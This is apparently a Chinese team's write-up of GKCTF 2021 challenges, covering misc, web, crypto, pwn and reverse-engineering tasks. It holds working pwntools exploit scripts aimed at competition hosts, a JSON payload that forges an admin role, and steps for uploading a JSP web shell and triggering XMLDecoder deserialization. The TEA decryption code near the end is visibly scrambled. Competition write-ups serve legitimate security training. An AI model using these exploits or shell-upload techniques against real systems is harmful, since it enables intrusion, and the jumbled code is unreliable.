点击上方“蓝字”,关注更多精彩
MISC
签到
1、打开流量找到cat /f4g的流量,追踪http流
2、将第一个看到的一串数字,十六进制转字符串再base64解码后,发现是空的
3、接着找到下面的重新转,发现转到base64解码后,无法再base64解码了
4、仔细和上面的base64对比发现,原来这个base64完全倒了,于是写脚本逆过来解密,发现双写的flag
import base64 f1 = open('flagsign.txt', 'w') content = list('wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQDjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0iCNMyIjMyIjMyIjMyI6AjMgAzMtMDMtEjMwIjO0eZ62ep5K0wKrQWYwVGdv5EItAiM1Aydl5mK6M6jlfpqnrQDt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLK0AIdZavo75mlvlCNMTM6EDMz0yMw0SMyAjM6Q7lpb7lmrQDrsCZhBXZ09mTg0CIyUDI3VmbqozoPW+lqeuCN0SLt0SLt0SLt0SLsxWZld1V913e7d2ZhFGbsZmZg0lp9iunbW+Wg0lp9iunbW+Wg0lp9iunbW+WK0wMxoTMwoDMyACMDN0QDN0QDlWazNXMx0Wbf9lRGRDNDN0ard0Rf9VZl1WbwADIdRampDKilvFIdRampDKilvVKpM2Y==QIhM0QDN0Q') content.reverse() flag1 = "".join(content).split("==") print(flag1) print(base64.b64decode(flag1[0]+"==")) print(base64.b64decode(flag1[1]+"==")) |
5、手动提取flag
flag{Welc0me_GkC4F_m1siCCCCCC!}
你知道apng吗
1、百度搜索apng发现是动图,于是想办法找到能够让apng正常运行的软件,发现firefox可以让apng图片正常显示,是小女孩抱着花走路跳的动图。
2、继续百度,到一个apngdis的软件,将apng拆分
3、在拆分好的图片找二维码分别在第2、10、18、26有二维码
flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea}
FireFox_Forensics
1、通过github搜索到一个软件firepwd直接解密得到flag
https://github.com/lclevy/firepwd
GKCTF{9cf21dda-34be-4f6c-a629-9c4647981ad7}
excel骚操作
1、打开excel,页面上说我看到flag了,你呢?于是想是不是把什么东西隐藏起来了,左点右点发现里面有的格子有1有的没有,直接拉一个大范围改常规格式
2、发现1的走势有点奇怪于是调整列宽,然后填充,发现原来是汉信码
3、扫码得到flag
flag{9ee0cb62-f443-4a72-e9a3-43c0b910757e}
银杏岛の奇妙冒险
1、玩游戏将生存模式改为创造模式,打赢书上面给的坐标处的怪物,会给一本新书,里面就是flag和下一个坐标。
得到flag{w31c0me_t0_9kctf_2021_Check_1n}
问卷题
flag{787c37cc-5ec2-9aae-f9c5-c1cc624caec0}
WEB
easycms
http://bbfc2a5d-0b65-4797-a93b-d24f0bf88bf9.node3.buuoj.cn/index.php?mode=getconfig
获取版本后网上找源码本地搭建
发现存在demo用户
使用demo/demo登录进入后台,这个cms高危操作要验证文件
可以在素材重命名的地方 上传一个txt文件 然后移动到tmp上 绕过文件验证
../../../../../system/tmp/giny
随后修改模板为cat flag
访问首页获取flag
babycat
register接口注册个用户进入系统
在download test的地方存在任意文件读取漏洞 发现需要执行readflag
读取web.xml后依次读取所有的class文件
审计代码这里可以通过gson的兼容性 创建一个role为admin的用户
payload={"data":"{\"username\":\"%s\",\"role\":'admin',\"password\":\"123\",\"role\":\"123\",'role':admin}"%(name)}
得到用户密码
gPFOUvzf/123
随后继续审计
在web2/WEB-INF/classes/com/web/servlet/uploadServlet.class处
发现上传文件的关键点没return 这waf等于没用 直接写shell了
upload目录无法访问 所以写到static下面
读取flag
babycat-revenge
和babycat一样 可以上传文件 但是这里解决了waf失效的问题 所以肯定就不能直接shell了。
仔细看 发现了xml格式是允许的
在登录接口 发现每次都会有新建数据库变量的操作
跟进发现数据库连接是通过读取db.xml来获取配置信息的 这里可以看到 存在xmldecoder反序列化
这里逻辑就很清晰了 首先覆盖db.xml文件为恶意代码然后登录触发反序列化。
反序列化可以研究一下文件上传的waf 限制了"Runtime", "exec", "ProcessBuilder", "jdbc", "autoCommit"
这里可以用printwrite来写shell(也给提示了
内容检测的话 可以直接使用unicode绕过
先覆盖db.xml
然后再次请求登录触发反序列化 写入shell(这里的绝对路径是从babycat拿的 忘了读环境变量 耽误了一血)
http://82804f15-8abb-4094-ba41-7555407568a3.node3.buuoj.cn/static/1.jsp?pwd=b&i=/readflag
CRYPTO
Random
python的rng用的mt19937,考烂了
用randcrack模块梭
from hashlib import md5
from randcrack import RandCrack
def foo(l,i):
a=[]
a.append(l[i])
b1=l[i+1]>>32
b2=l[i+1]&(2**32-1)
a.append(b2)
a.append(b1)
b1=l[i+2]>>64
b2=(l[i+2]&(2**64-1))>>32
b3=l[i+2]&(2**32-1)
a.append(b3)
a.append(b2)
a.append(b1)
return a
with open(r'random.txt','r') as f:
l=f.readlines()
l=[int(i.strip()) for i in l]
ll=[]
for i in range(0,len(l),3):
ll+=foo(l,i)
rc=RandCrack()
for i in ll:
rc.submit(i)
aa=rc.predict_getrandbits(32)
print('flag{%s}'%md5(str(aa).encode()).hexdigest())
RRRRsa
from Crypto.Util.number import *
from gmpy2 import gcd
e=65537
c=13492392717469817866883431475453770951837476241371989714683737558395769731416522300851917887957945766132864151382877462142018129852703437240533684604508379950293643294877725773675505912622208813435625177696614781601216465807569201380151669942605208425645258372134465547452376467465833013387018542999562042758
n1=75003557379080252219517825998990183226659117019770735080523409561757225883651040882547519748107588719498261922816865626714101556207649929655822889945870341168644508079317582220034374613066751916750036253423990673764234066999306874078424803774652754587494762629397701664706287999727238636073466137405374927829
c1=68111901092027813007099627893896838517426971082877204047110404787823279211508183783468891474661365139933325981191524511345219830693064573462115529345012970089065201176142417462299650761299758078141504126185921304526414911455395289228444974516503526507906721378965227166653195076209418852399008741560796631569
hint1=23552090716381769484990784116875558895715552896983313406764042416318710076256166472426553520240265023978449945974218435787929202289208329156594838420190890104226497263852461928474756025539394996288951828172126419569993301524866753797584032740426259804002564701319538183190684075289055345581960776903740881951
hint2=52723229698530767897979433914470831153268827008372307239630387100752226850798023362444499211944996778363894528759290565718266340188582253307004810850030833752132728256929572703630431232622151200855160886614350000115704689605102500273815157636476901150408355565958834764444192860513855376978491299658773170270
n2=114535923043375970380117920548097404729043079895540320742847840364455024050473125998926311644172960176471193602850427607899191810616953021324742137492746159921284982146320175356395325890407704697018412456350862990849606200323084717352630282539156670636025924425865741196506478163922312894384285889848355244489
c2=67054203666901691181215262587447180910225473339143260100831118313521471029889304176235434129632237116993910316978096018724911531011857469325115308802162172965564951703583450817489247675458024801774590728726471567407812572210421642171456850352167810755440990035255967091145950569246426544351461548548423025004
hint3=25590923416756813543880554963887576960707333607377889401033718419301278802157204881039116350321872162118977797069089653428121479486603744700519830597186045931412652681572060953439655868476311798368015878628002547540835719870081007505735499581449077950263721606955524302365518362434928190394924399683131242077
hint4=104100726926923869566862741238876132366916970864374562947844669556403268955625670105641264367038885706425427864941392601593437305258297198111819227915453081797889565662276003122901139755153002219126366611021736066016741562232998047253335141676203376521742965365133597943669838076210444485458296240951668402513
a=pow(2020*(hint2-212121),202020,n1)
b=pow(2021,202020,n1)*hint1
q1=gcd(a-b%n1,n1)
p=pow(c1,inverse(e,(q1-1)*(n1//q1-1)),n1)
a=pow(hint3,212121,n2)*pow(2020,212121*202020,n2)%n2
b=pow(hint4,202020,n2)*pow(2021,212121*202020,n2)%n2
p2=gcd(a-b%n2,n2)
q=pow(c2,inverse(e,(p2-1)*(n2//p2-1)),n2)
m=pow(c,inverse(e,(p-1)*(q-1)),p*q)
print(long_to_bytes(m))
PWN
checkin
#coding:utf-8
import sys
from pwn import *
context.log_level='debug'
elfelf='./login'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
if len(sys.argv)==1 :
io=process(elfelf)
# io=process([elf,'127.0.0.1','9999'])
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1207]
else :
io=remote('node3.buuoj.cn',26961)
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1207]
io.recv()
pay='admin\x00\x00\x00'+p64(0x0000000000401ab3)+p64(elf.got['puts'])+p64(0x4018B5)
io.send(pay)
io.recv()
io.send('admin\x00\x00\x00'+p64(0)*3+p64(0x602400))
libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
libc.address=libc_base
bin_sh_addr=libc.search('/bin/sh\x00').next()
system_addr=libc.sym['system']
io.recv()
pay='admin\x00\x00\x00'*3+p64(0x4527a+libc_base)
io.send(pay)
io.recv()
# gdb.attach(io)
io.send('admin\x00\x00\x00'*4+p64(0x602418))
success('libc_base:'+hex(libc_base))
# success('heap_base:'+hex(heap_base))
#
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
demo_catroom
#coding:utf-8
import sys
from pwn import *
context.log_level='debug'
elfelf='./client'
#context.arch='amd64'
while True :
# try :
elf=ELF(elfelf)
context.arch=elf.arch
if len(sys.argv)==1 :
# io=process(elfelf)
# sh=process('./server')
io=process(['./client','117.21.200.165','27268'])
# libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
# one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1207]
else :
# sh=ssh(host='node3.buuoj.cn', user='ctf', port=25744, password='123456')
# io=remote('node3.buuoj.cn',28324)
# libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
one_gadgaet=[0x45226,0x4527a,0xf0364,0xf1207]
def add(a,b):
io.sendlineafter('0 exit \n','1')
io.sendlineafter('\n',a)
io.sendlineafter('\n',b)
def login(a,b):
io.sendlineafter('0 exit \n','2')
io.sendlineafter('\n',a)
io.sendlineafter('\n',b)
def show(a):
io.sendlineafter('0 exit \n','3')
io.send(a)
return io.recv()
def delete(a,b):
io.sendlineafter('0 exit \n','4')
io.sendlineafter('\n',a)
io.sendlineafter('\n',b)
add('a','a')
add('b','b')
add('c','c')
delete('a','a')
add('a'*0x20,'a'*0x28+'\xff'*8+'admin')
login('admin','b')
# sh.recv()
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
RE
QQQQT
Base58
12t4tww3r5e77
Crash
Golang恢复符号表后 main函数中限定了flag长度为43且格式为GKCTF{}
后进入main_check
第一个main_encrypto中有Encrypt_DesEncrypt,中又包含crypto_des_NewTripleDESCipher 所以是3des
秘钥已经给出:
解密即可
剩下的三个第一个为sha256
第二个为sha512
最后一个为md5
爆破解密即可,需要注意的是每个均为4个字节
APK-debug
Native里tea
需要注意的是key被改了
解密就行
#include <stdio.h>
void DecryptTEA(unsigned int *firstChunk, unsigned int *secondChunk, unsigned int* key)
{
unsigned int sum = 0;
unsigned int y = *firstChunk;
unsigned int z = *secondChunk;
unsigned int delta = 0x458BCD42;
sum = delta << 5;
for (int i = 0; i < 32; i++)
{
int main() {
unsigned int key[4] = {9, 7, 8, 6};
unsigned int data[2] = {0xF5A98FF3, 0xA21873A3};
DecryptTEA(&data[0], &data[1], key);
printf("0x%x 0x%x\n", data[0], data[1]);
printf("%s\n",(char*)data);
}
z -= (y << 4) + key[2] ^ y + sum ^ (y >> 5) + key[3];
y -= (z << 4) + key[0] ^ z + sum ^ (z >> 5) + key[1];
sum -= delta;
}
*firstChunk = y;
*secondChunk = z;
}
更多CTF-Wrietup 请关注EDI安全!
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎各位大佬小白入驻,大家一起打CTF,一起进步。
扫码关注
了解更多